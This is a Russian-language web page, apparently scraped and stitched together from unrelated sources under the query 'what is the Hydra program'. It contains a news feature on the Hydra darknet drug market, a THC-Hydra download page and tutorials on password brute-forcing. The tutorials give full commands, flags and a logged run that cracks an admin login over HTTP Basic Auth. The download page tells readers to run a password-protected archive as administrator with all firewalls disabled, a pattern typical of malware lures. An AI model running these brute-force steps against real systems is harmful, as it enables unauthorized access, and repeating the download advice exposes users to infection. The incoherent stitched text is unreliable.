Программа гидра что это

Миф о русской «Гидре». Чем закончилась история крупнейшей площадки по продаже наркотиков (и кончилась ли)

В середине апреля стало известно об аресте москвича Дмитрия Павлова — одного из предполагаемых основателей интернет-площадки по продаже наркотиков Hydra («Гидра»). Незадолго до этого маркетплейс прикрыли в рамках совместной операции властей США и Германии. Hydra успешно пережила своего главного конкурента — торговую площадку RAMP, и за семь лет существования она превратилась из «наркостартапа» в крупнейшего игрока российского и мирового рынков запрещённых веществ. Об истории нелегального бизнеса — в материале «Секрета».

Пионеры индустрии

В 2011 году мировой рынок наркотиков изменился навсегда: в Даркнете запустили сайт SilkRoad, который позволял купить дозу онлайн. Оплату принимали в биткоинах (одна единица электронной валюты в начале 2011 года стоила меньше 1$). Это стало настоящей революцией в наркобизнесе. Потребителям больше не было необходимости связываться с уличными дилерами — наркотики клиентам SilkRoad присылали обычной почтой. Главным рынком сбыта SilkRoad стали США.

Что будет с Hydra и её пользователями?

Первым товаром на площадке были псилоцибиновые грибы, но уже через четыре месяца ассортимент вырос до 300 позиций. Вскоре сайт привлек внимание прессы, за которым последовал резкий рост числа пользователей. По оценкам исследователей и журналистов, если в первой половине 2012 года месячный оборот маркетплейса составлял $1,2 миллиона, то уже к августу 2013-го годовая выручка выросла до $30–45 миллионов.

Правоохранительные органы США не могли остаться в стороне и приложили все усилия, чтобы выйти на администратора площадки, скрывавшегося под ником Ужасный Пират Робертс. В конечном счёте эти попытки увенчались успехом: 1 октября 2013 года сотрудники ФБР задержали 29-летнего Росса Ульбрихта, который и был владельцем SilkRoad.

В мае 2015 года его признали виновным в торговле наркотиками в особо крупном размере, а также в сговоре с целью отмывания средств и в хакерской деятельности. Суд приговорил Ульбрихта к двум пожизненным срокам.

SilkRoad закрыли сразу же после задержания владельца, но к тому времени успело возникнуть множество аналогов этой площадки.

В России первым крупным сайтом такого формата стал RAMP (Russian Anonymous Marketplace), появившийся в октябре 2012 года. С помощью обычного браузера на площадку попасть было невозможно: для доступа требовался специальный анонимный браузер Tor, шифрующий данные и изменяющий IP-адрес пользователя.

Сбыт в России был простым — основной схемой распространения запрещённых веществ стали тайники-закладки. Чаще всего это были «готовые клады» или «автошопы»: сразу после уплаты определённой суммы в биткоинах клиенту присылали координаты сделанной заранее закладки.

Группы молодых людей, увлечённо раскапывающих неприметный на вид клочок земли где-нибудь в парке или во дворе многоэтажки, стали обычным явлением в российских городах. Однако далеко не всегда «клады» закапывали в землю — довольно часто их прикрепляли на магните и прятали в городском ландшафте (даже на детских площадках). Вокруг RAMP начала формироваться собственная субкультура с определёнными правилами, обычаями и сленгом, непонятным для непосвящённых.

Что происходит с Hydra и её основателем?

С точки зрения бизнеса RAMP представлял собой аналог легальных торговых интернет-площадок. При такой модели отдельные магазины размещают на сайте объявления о продаже товара в обмен на фиксированную сумму. Администраторы RAMP также выступали арбитрами в спорах недовольных клиентов с магазинами. Крупные магазины могли насчитывать десятки сотрудников, а объявления о найме кладменов (людей, которые делают закладки с наркотиками) можно было встретить даже в обычных соцсетях.

Борьба за наркорынок

Постепенно у RAMP начали появляться конкуренты, претендовавшие на кусок рынка (хотя некоторые существовали ещё до появления этой площадки). Развернулась нешуточная борьба за клиента, в которой администраторы RAMP не останавливались ни перед чем. В ход шли как DDoS-атаки, так и слив личных данных соперников полиции.

К концу 2015 года конкуренцию RAMP могли составить разве что две площадки, которые специализировались на синтетических каннабиоидах («солях») и дизайнерских стимуляторах («спайсах»). Перед лицом могущественного врага они решили объединиться. Так на свет появилась Hydra. Почему её создатели выбрали именно такое название, неизвестно — возможно, это был своего рода совет противникам не связываться с мифическим чудовищем, которое почти невозможно победить.

Было очевидно, что войны между конкурентами избежать не получится, хотя они и торговали разными наркотиками. RAMP был нацелен на молодых людей среднего класса из городов-миллионников, «сидевших» на более традиционных наркотиках. Продавать «соли» и «спайсы» на площадке было запрещено.

Hydra, напротив, в большей степени ориентировалась на клиентов из небольших провинциальных городов, которые оказались во власти наркотической эпидемии нового типа. Это обеспечило новому маркетплейсу серьёзное преимущество. Синтетические наркотики, которые в изобилии были представлены на площадке, быстро разошлись.

Прежде всего речь идёт о стимуляторах, вызывающих мощнейшую зависимость в короткие сроки. Эти вещества задёшево производили (и производят) внутри России в подпольных лабораториях. Относительная доступность спровоцировала настоящую эпидемию синтетических наркотиков в России.

«Сейчас синтетика вытеснила все наркотики. Продаются синтетические аналоги наркотиков, которые были раньше», — рассказал «Секрету» представитель российских реабилитационных программ Drug Free в ООН Никита Лушников.

«Это то, что называется «солью»», — очень страшный наркотик, который просто убивает психику человека. Если опий просто убивал организм и вызывал зависимость, но человека ещё можно было вылечить, то здесь уже идёт психиатрия и сделать это очень тяжело», — заключил специалист.

RAMP, стремясь ограничить экспансию конкурента, требовал от оптовых производителей и поставщиков веществ отказаться от контрактов с Hydra под угрозой отказа от дальнейшего сотрудничества. После того как один из крупнейших поставщиков синтетических наркотиков — магазин «Химпром», попытался выбить себе более выгодные условия, пригрозив уходом на Hydra, администратор RAMP сдал его полицейским.

Были арестованы десятки человек, конфискованы тонны «спайсов». Расправа над «Химпромом» должна была преподать урок другим магазинам, но вышло наоборот — они всё чаще покидали RAMP, переходя на Hydra. Кроме того, RAMP стал регулярно подвергаться DDoS-атакам со стороны конкурента. Перебои в работе сайта вызывали недовольство продавцов и покупателей.

Финальным ударом для площадки стало закрытие крупнейшей в России криптобиржи BTC-e, где хранились деньги наркоторговцев. По одной из версий, руководство RAMP узнало об аресте предполагаемого владельца BTC-e Александра Винника и успело вывести деньги (больше $170 миллионов) до закрытия биржи 25 июля 2017 года. В это же время сайт RAMP перестал открываться. Позднее МВД объявило о ликвидации площадки, но затем выяснилось, что речь шла лишь о трёх магазинах.

По данным «Ленты.ру», администратору RAMP под ником Stereotype дали возможность сбежать с деньгами в обмен на уничтожение сайта. Так Hydra осталась единственным по-настоящему большим игроком на рынке.

Время возможностей

Гибель RAMP серьёзно укрепила позиции его конкурента, который в одночасье превратился в монополиста. Согласно исследованиям российских журналистов, уже в августе 2017 года на Hydra зарегистрировались свыше 23 000 новых пользователей — в несколько раз больше, чем обычно. С 2016 по 2019 год пользователи внесли на Hydra почти 65 млрд рублей. Это примерно в пять раз больше, чем общий объём сделок, прошедший через весь западный Даркнет с 2011 по 2015 год.

Помимо наркотиков, на площадке также торговали фальшивыми деньгами и документами. Там же можно было заказать услуги по сбыту наркотиков, взлому аккаунтов и кибератакам. Кроме того, известно о случаях, когда через Hydra находили исполнителей для покушения — например, через эту площадку заказали громкое убийство следователя по особо важным делам Евгении Шишкиной.

В июле — августе 2017 года Hydra даже запустила рекламные ролики на YouTube, на которые обратили внимание СМИ и пользователи видеохостинга. В некоторых видео демонстрировалась ссылка, ведущая на сайт маркетплейса в сети Tor. Как подобная реклама появилась на YouTube, правила которого прямо запрещают призывы к употреблению наркотиков, —загадка.

У руководителей Hydra были большие планы: в декабре 2019 года площадка объявила о намерении перейти на международный уровень к осени следующего года. Новый проект получил название Eternos. Специально для него создавалась новая анонимная сеть AspaNET, которая должна была заменить Tor.

Также пользователям обещали ещё множество нововведений, включая встроенную криптобиржу и мессенджер с надёжным шифрованием. Деньги на создание новой площадки планировалось собрать с помощью ICO. Желающим предлагали купить токены по $100 за штуку и тем самым вложиться в бизнес.

Однако в июне 2020 года стало известно, что старт Eternos переносится на неопределённый срок. Официальной причиной стала ситуация вокруг пандемии коронавируса, но и до этого эксперты предупреждали, что мировая экспансия Hydra вряд ли возможна из-за целого ряда причин, включая эффективную работу правоохранительных органов на Западе и в целом гораздо меньший объём торговли наркотиками через интернет. Несмотря на неудачу с запуском Eternos, площадка продолжала развитие — с каждым годом на ней продавали всё больше наркотиков. По данным исследования американских компаний Chainalysis и Flashpoint, в 2020 году объём транзакций на Hydra составил не менее $1,37 миллиарда. Для сравнения, в 2017 году этот показатель составлял $220 миллионов.

Гибель чудовища

В отличие от RAMP, который перед закрытием довольно долго пребывал в агонии, конец Hydra оказался внезапным и быстрым. 5 апреля 2022 года правоохранительные органы США совместно с немецкой полицией провели операцию, в результате которой удалось отключить немецкие серверы Hydra. Кроме того, были конфискованы биткоины на сумму в $25 миллионов. В тот же день сайт маркетплейса перестал открываться.

Немного позже американские власти назвали имя первого подозреваемого по делу наркоплощадки — им оказался 30-летний Дмитрий Павлов из Череповца. По версии Минюста США, он был администратором серверов Hydra, «предоставляя ей критическую инфраструктуру». «Русской службе Би-би-си» Павлов заявлял, что его компания лишь предоставляла ресурсы в аренду в качестве посредников и он не знал, что именно находится на серверах.

Эти объяснения не помогли: 11 апреля Мещанский районный суд Москвы заключил Павлова под стражу по делу о производстве, сбыте и распространении наркотиков. Хотя многие эксперты предполагали, что вскоре после операции иностранных правоохранителей Hydra откроется вновь, этого до сих пор не произошло.

Некоторые из бывших администраторов площадки признали, что у неё практически нет шансов восстановить работу. Члены команды сайта собираются искать новую работу. При этом опрошенные «Секретом» эксперты считают, что закрытие Hydra не слишком сильно скажется на отечественном наркорынке. «На то она и Гидра, чтобы вырастали новые головы. В мире наркобизнеса по-другому не получается — свято место пусто не бывает», — констатировала директор фонда Андрея Рылькова (признан «иностранным агентом» на территории России) Анна Саранг в разговоре с «Секретом».

«Помимо «Гидры», существует много других сайтов в Даркнете, поэтому её закрытие никак не решит проблему — может быть, только немного сбавит количество запрещённых веществ, ну и скажется на цене наркотических прекурсоров», — считает Никита Лушников.

Он также не исключает, что уничтожение Hydra может ускорить эволюцию наркоиндустрии — и на смену закладкам придёт какая-то другая схема.

Пока же в российском Даркнете разворачивается борьба за титул нового короля наркорынка. На него могут претендовать сразу несколько площадок. Однако быстро организовать полноценную замену Hydra вряд ли получится — слишком огромной она была. На момент закрытия на платформе «Гидры» действовало около 19 000 магазинов. Кто станет её преемником — пока вопрос открытый. Коллажи: «Секрет фирмы», freepik.com, Unsplash

Источник: secretmag.ru

THC Hydra v8.5 для Windows

Безопасность

Просмотров 396

Специфическое приложение, предназначенное для тестирования различных удалённых серверов на предмет обеспечения должной безопасности.

Описание программы

Программа работает исключительно из командной строки и не имеет какого-либо пользовательского интерфейса. Для запуска используется соответствующий исполняемый файл, который будет описан дальше. Работа осуществляется при помощи ввода специальных операторов, а также диагностики получаемых ответов.

Как пользоваться

Для того чтобы начать работать с данным приложением, достаточно запустить предварительно распакованный исполняемый файл. Реализуется это по такому сценарию:

1. В первую очередь прокручиваем содержимое странички ниже, находим специальную кнопку и с её помощью загружаем архив со всеми нужными нам файлами.
2. Обращай внимание на прикреплённый текстовый документ. Именно он содержит пароль для распаковки. Извлекаем содержимое архива в любой удобный каталог.
3. Запускаем приложение от имени администратора. Для этого вместо привычного двойного левого клика делаем правый клик мышью из контекстного меню выбираем нужный нам пункт.

Обратите внимание: для корректной работы данной программы нужно предварительно отключить все имеющиеся сетевые экраны Windows.

Достоинства и недостатки

Разберём набор сильных и слабых сторон THC Hydra. Хотя, в данном случае говорить особо не о чем по той причине, что у этого программного обеспечения не так много конкурентов.

• уникальный функционал;
• полная бесплатность.

• отсутствие пользовательского интерфейса;
• для работы с приложением нужно знать множество команд;
• нет русского языка.

Скачать

Новейшая версия приложения, как всегда, доступна по прямой ссылке с официального сайта разработчика.

Лицензия:	Бесплатно
Платформа:	Windows 7, 10, 11
Язык:	Английский

Источник: keysprog.ru

Знакомимся с Hydra gtk, утилитой для Аудита безопасности

Hydra – утилита для брутфорса, позволяет подбирать пароли к множеству протоколов. Имеется как консольная версия данной утилиты, так и с графическим интерфейсом. В данной же статье, мы как раз и будем рассматривать способ брутфорса через графический интерфейс.

При помощи этой замечательной утилиты, вы сможете сбрутфорсить более чем к 30 протоколам, например к ftp, smb, http и к https тоже, ssh, vnc, pop3 и так далее. Кстати, для брутфорса ssh необходим пакет libssh, имейте это ввиду. Более подробно ознакомиться с данным продуктом можно на GitHub. В Kali Linux, а так же в Parrot OS Hydra уже предустановлена, в других же дистрибутивах необходимо устанавливать вручную.

Устанавливаем Hydra gtk в Debian / Ubuntu

В данной статье мы рассмотрим вариант установки Гидры в Debian/Ubuntu из официальных репозиториев, то же самое будет касаться и остальных дистрибутивов, основанных на Debian/Ubuntu. Вы так же можете собрать Гидру из GitHub, инструкция прилагается все на том же GitHub, в том числе и необходимые зависимости. А в данной статье ограничимся лишь официальными репозиториями. Если же вам будет интересен полный процесс, то есть, установка из GitHub и работа с Hydra в терминале, пишите в комментариях и в одной из следующих статей обязательно опишу подробно работу с этим замечательным инструментом. И так переходим к установке, открываем терминал и вводим команды:

sudo apt update sudo apt install hydra-gtk

Вместе с графической версией установиться и консольная. После чего можно переходить к аудиту, проводить аудит безопасности будем на протоколе ssh, но, принцип в графической версии примерно везде один и тот же.

Проводим Брутфорс SSH с Hydra

Для брутфорса необходимы словари с паролями, их вы можете либо скачать из интернета, либо, составить самим, например, утилитой Crunch. Одни из самых популярных словарей для брутфорса – rockyou.txt, cain.txt, john.txt, это так, на заметку читателям.

Когда установка Hydra-gtk завершиться, запускаем утилиту, на первой вкладке “Target” нас интересуют несколько палей, и первое поле это “Single Target”, в данном поле необходимо указать IP адрес жертвы. Так же, в поле “Target List” можно указать список IP адресов, собранных в одном файле. Для примера, будем атаковать IP адрес – “192.168.88.251”, далее, в поле “Port” указываем порт, на который будет совершаться атака, это может быть как 80 порт, так и 443. Но, так как мы будем брутить SSH, то указываем порт 22. В поле “Protocol” выбираем “ssh”. Если вы атакуете протокол, который использует SSL, для него можно отметить галочкой пункт “Use SSL”, в данном же случае, не о каком SSL речь не идет:

Переходим во вкладку “Passwords”, и тут необходимо указать логин жертвы в поле “Username”, либо, выбрать список логинов в поле “Username List”. В список можно включить самые популярные логины, например тот же “admin”, если же вам заранее известен логин, указываем его в поле “Username” и двигаемся дальше. Переходим к полям “Password”, в первом поле “Password” указываем пароль, если к примеру вы его знаете, если же нет, переходим ко второму полю, вот тут то нам и понадобятся словари с паролями. Выбираем поле “Password List” и указываем словарь с паролями, заранее составленный либо, скаченный из интернета. Последнее поле “Generate” позволяет утилите Hydra самой составлять словари, для этого указываем количество символов, например от 3 до 5 символов в пароле, далее указываем буквы или цифры, например, прописные “a” и заглавные “A”, а так же указываем цифры, к примеру “1”. В примере же я буду использовать зарание составленный словарь под названием “key-pass”:

Переходим к вкладке “Tuning”, в поле “Number of Task” указываем сколько одновременно запросов будет даваться на сервер, рекомендуется по моему 4, если не ошибаюсь. В поле “Timeout” указываем промежуток времени, через который будут посылаться запрос:

Остальные вкладки и поля рассматривать не будем, так как там настройки прокси и так далее, в данный момент это не к чему, так как мы не собираемся взламывать, а всего лишь проводим аудит безопасности своей же системы. Переходим во вкладку “Start”, тут все просто, нажимаем на кнопку “Start” и дожидаемся когда Hydra сделает свое дело. Если же в словаре не нашлось пароля, указываем следующий словарь и продолжаем брутфорс:

В самом низу утилиты Hydra отображаются команды, которые вы можете в будущем ввести в терминальной версии утилиты “hydra -s 22 -l admin -P…”. Таким образом вы можете брутфорсить и остальные протоколы, например, тот же ftp, как видите, в работе с Hydra gtk нет не чего сложного. Правда, стоит понимать некоторые вещи, такие как порты, протоколы или тот же SSL.

Заключение

При использовании Hydra, а так же других утилит, которые используются для брутфорса и взлома, в том числе и поисковик Shodan, помните о законе. Все описанное в данной статье носит лишь ознакомительный характер, а незаконное использование подобных инструментов может повлечь за собой уголовную ответственность. В первую очередь, данная инструкция призвана провести аудит безопасности ваших систем на предмет возможного взлома. Если же вам интересна данная тема про Hydra, пишите в комментариях, и как уже говорилось выше, в одной из следующих статей разберем более подробно данную утилиту.

А на этом сегодня все. Надеюсь данная статья будет вам полезна.
Журнал Cyber-X

Источник: cyber-x.ru

Брутим пароли с Гидрой (THC-Hydra)

Внимание! Статья носит исключительно ознакомительную информацию с утилитой и ни в коем случае не призывает использовать её в мошеннических целях. Как правило, данная утилита может быть использована для проведения тестов на уязвимость собственных ресурсов. Не забывайте предохраняться и натянуть на себя VPN хотя бы.

Когда penetration testing заходит в тупик, остается крайний метод — подбор пароля. Дабы уницифировать все инструменты подбора паролей и не использовать для разных задач отдельные брутфорсы есть замечательный универсальный инструмент — THC-Hydra, который имеет поддержку пароля по/для Asterisk , AFP , Cisco AAA , Cisco auth , Cisco enable , CVS , Firebird , FTP , HTTP-FORM-GET , HTTP-FORM-POST , HTTP-GET , HTTP-HEAD , HTTP-PROXY , HTTPS-FORM-GET , HTTPS-FORM-POST , HTTPS-GET , HTTPS-HEAD , HTTP-Proxy , ICQ , IMAP , IRC , LDAP , MS-SQL , MYSQL , NCP , NNTP , Oracle Listener , Oracle SID , Oracle , PC-Anywhere , PCNFS , POP3 , POSTGRES , RDP , Rexec , Rlogin , Rsh , SAP/R3 , SIP , SMB , SMTP , SMTP Enum , SNMP v1+v2+v3 , SOCKS5 , SSH (v1 and v2) , SSHKEY , Subversion , Teamspeak (TS2) , Telnet , VMware-Auth , VNC и XMPP .

Установка

Пакет hydra содержится в epel-репозитории, поэтому достаточно подключить его и установить.

yum install -y epel-release
yum install -y hydra

Или собрать с сорсов для пользователей других ОС:

mkdir ~/hydra_src cd ~/hydra_src
wget https://github.com/vanhauser-thc/thc-hydra/archive/master.zip unzip master.zip rm -f master.zip
cd thc-hydra-master/
yum install gcc mysql-devel libssh
make clean ./configure
make make install
hydra -h
Hydra v7.5 (c)2013 by van Hauser/THC -x -h» to get help
-e nsr try «n» null password, «s» login as pass and/or «r» reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated «login:pass» format, instead of -L/-P options
-M FILE list of servers to be attacked in parallel, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-U service module usage details
server the target server (use either this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-head http[s]-get-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-crammd5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs — usage only allowed
for legal purposes. This tool is licensed under AGPL v3.0.
The newest version is always available at http://www.thc.org/thc-hydra
These services were not compiled in: sapr3 afp ncp oracle.

Use HYDRA_PROXY_HTTP/HYDRA_PROXY and HYDRA_PROXY_AUTH environment for a proxy.
E.g.: % export HTTP_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
% export HTTP_PROXY_HTTP=http://proxy:8080
% export HTTP_PROXY_AUTH=user:pass

Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5

Словари

Брутить можно как с помощью подбора посимвольно, так и с помощью подготовленного словаря наиболее часто используемых паролей. Рекомендую первым делом попытаться подобрать пароль со словарем, и уже если и этот способ не увенчался успехом — переходить к прямому бруту посмивольно.

Использование

Рассмотрим флаги запуска:

• -R Восстановить предыдущую сессию, которая по какой-либо причине была прервана
• -S Использовать SSL соединение
• -s PORT Указание порта (отличного от дефолтного) сервиса
• -l LOGIN Использовать указанный логин для попытки аутентификации
• -L FILE Использовать список логинов из указанного файла
• -p PASS Использовать указанный пароль для попытки аутентификации
• -P FILE Использовать список паролей из указанного файла
• -x Генерировать пароли для подбора самостоятельно, указывается в формате -x MIN:MAX:CHARSET, где MIN — это минимальная длинна пароля, MAX — соответственно, максимальная, а CHARSET — это набор символов, в котором a означает латиницу в нижнем регистре, A — в верхнем регистре, 1 — числа, а для указания дополнительных символов — просто укажи их как есть. Вот несколько примеров генерации паролей:
• -x 3:5:a — длинной от 3 до 5 символов, состоящие только из символов латиницы в нижнем регистре;
• -x 5:8:A1 — длинной от 5 до 8 символов, состоящие из символов латиницы в верхнем регистре + цифр;
• -x 1:3:/ — длинной от 1 до 3 символов, состоящие только из символов слеша /;
• -x 5:5:/%,.- — длинной в 5 символов, состоящие только из символов /%,.-;
• -e nsr Укажи n для проверки пустых паролей, s для попытки использования в качестве пароля — логин, и (или) r для попытки входа под перевернутым логином
• -u Пытаться подобрать логин а не пароль
• -C FILE Использовать файл в формате login:pass вместо указания -L/-P
• -M FILE Файл со списком целей для брутфорса (можно с указанием порта через двоеточие), по одному на строку
• -o FILE Записать подобранную пару логин/пароль в файл, вместо того чтоб просто вывести в stdout (будет указан с указанием сервера, к которому подобран — не запутаешься)
• -f / -F Прекратить работу, как только первая пара логин:пароль будет подобрана. -f только для текущего хоста, -F — глобально.
• -t TASKS Количество параллельных процессов (читай — потоков). По умолчанию 16
• -w Таймаут для ответа сервера. По умолчанию 32 секунды
• -W Таймаут между ответами сервера
• -4 / -6 Использовать IPv4 (по умолчанию) или IPv6 адреса (при указании с -M всегда заключай в [])
• -v Более подробный вывод информации о процессе
• -V Выводить каждый подбираемый логин + пароль
• -d Режим дебага
• -O Использовать старый SSL v2 и v3
• -q Не выводить сообщения об ошибках подключения
• -U Дополнительная информация о использовании выбранного модуля
• -h Вывод справочной информации

Примеры работы

Basic Authentication

Cканируя диапазон адресов мы попадаем на некоторый интерфейс, доступный по http протоколу, но закрытый для доступа при помощи Basic Authentication (пример настройки с помощью nginx).

• IP сервера: 192.168.2.15;
• Сервис: http;
• Путь, который закрыт для нас запросом пары логин/пароль: /admin/;
• Порт, на котором работает http сервер: 80;

Предположим (или любым доступным путем выясним), что логин для авторизации admin , и нам неизвестен лишь пароль. Подбирать будем с помощью заранее подготовленного словаря и с использованием модуля http-get :

[[email protected] opt]# hydra -l admin -P /opt/pass.txt -o ./hydra_result.log -f -V -s 80 192.168.2.15 http-get /admin/
Hydra v7.5 (c)2013 by van Hauser/THC admin» — pass «slt1311113» — 1 of 234 [child 0]
[ATTEMPT] target 192.168.2.15 — login «admin» — pass «slt19391936» — 2 of 234 [child 1]
[ATTEMPT] target 192.168.2.15 — login «admin» — pass «slt2006pp» — 3 of 234 [child 2]
[ATTEMPT] target 192.168.2.15 — login «admin» — pass «slt21l16» — 4 of 234 [child 3]
[ATTEMPT] target 192.168.2.15 — login «admin» — pass «slt5390» — 5 of 234 [child 4]
[ATTEMPT] target 192.168.2.15 — login «admin» — pass «slt911pvpsw2» — 6 of 234 [child 5]
[ATTEMPT] target 192.168.2.15 — login «admin» — pass «sltanya» — 7 of 234 [child 6]
[ATTEMPT] target 192.168.2.15 — login «admin» — pass «admin» — 8 of 234 [child 7]
[ATTEMPT] target 192.168.2.15 — login «admin» — pass «password» — 9 of 234 [child 8]
.
[80][www] host: 192.168.2.15 login: admin password: password
[STATUS] attack finished for 192.168.2.15 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

Статья ожидает продолжения..

Источник: bogachev.biz

Онлайн брутфорс паролей с Hydra-GTK

Мануал

Автор cryptoparty На чтение 3 мин Опубликовано 25.07.2018

Hydra (более известный как «thc-hydra») – это онлайн-инструмент для атаки на пароли.

Это перебор различных комбинаций для живых сервисов, таких как telnet, ssh, http, https, smb, snmp, smtp и т. д.

Hydra поддерживает 30+ протоколов, включая их SSL-совместимые.

Это брутфорсинг в отношении сервисов, которые мы указываем с помощью списков пользователей и списков слов.

Hydra работает в 4 режимах:

• Одно имя пользователя и один пароль
• Список пользователей и один пароль
• Одно имя пользователя и пароль
• Список пользователей и пароль

Пентестеры используют этот инструмент для проверки / аудита сложности паролей сервисов, в основном там, где прямой сниффинг невозможен.

Мы обсудим этот инструмент в следующем учебном пособии.

Опции

Вы можете открыть xHydra из меню или терминала Kali linux.

Target- настройки различных целевых пулов

Passwords – укажите параметры пароля и списки wordlist

Tuning – Определите, насколько быстро будет работать гидра. Также доступны другие варианты синхронизации.

Specific – для тестирования по конкретным объектам, например, домену https и т. д.

Start – Start / Stop #127760; Выполняем атаку включения локального файла 21.12.2022

Включение локальных файлов (LFI) – это тип кибер-атаки, при которой злоумышленник получает доступ к конфиденциальной информации, хранящейся на сервере, используя уязвимости сервера и включая локальные файлы. Злоумышленник ищет небезопасные методы и недостатки в системе, которые могут быть использованы для получения доступа к конфиденциальным файлам, например, содержащим системные настройки, конфигурационные файлы и другие важные данные. Этот […]

Разработать сайта сегодня может каждый, и если ранее компании выбирали варианты дешевле, то сегодня очень желанием является создание сайта бесплатно. Реально ли это, следует разобраться в деталях. Сразу хочется сказать, что теоретически это возможно, но не для всех типов сайтов. По крайней мере, если хотите развивать свой ресурс, а не просто сделать и забросить. Бесплатный […]

Кэш браузера — это сохраненные копии контента с сайтов, которые пользователь просматривал в браузере. Эти копии сохраняются в памяти компьютера. Функция кэширования браузера преследует две цели: экономия трафика. Контент сохраняется на компьютере пользователя, поэтому ему не приходится каждый раз заново загружать его из интернета; ускорение загрузки страниц, которые пользователь посещал ранее. Это также достигается за […]

Это краткое руководство объясняет, что такое ramfetch, как установить ramfetch на Linux и как отобразить информацию о памяти с помощью ramfetch в операционных системах Linux. Что такое ramfetch? Для Linux существует множество программ с данным функционалом (например, Neofetch, Screenfetch, Macchina и т.д.). Эти программы используются для отображения общей информации о системе Linux, такой как версия […]

Использование памяти в Linux обычно измеряется объемом оперативной памяти, используемой определенным процессом. Это можно отследить с помощью команды free, которая отображает общий объем памяти, используемую память и свободную память, доступную в системе. Использование процессора в Linux обычно измеряется количеством ядер процессора, используемых определенным процессом. Это можно отследить с помощью команды top, которая отображает количество ядер […]

Источник: itsecforu.ru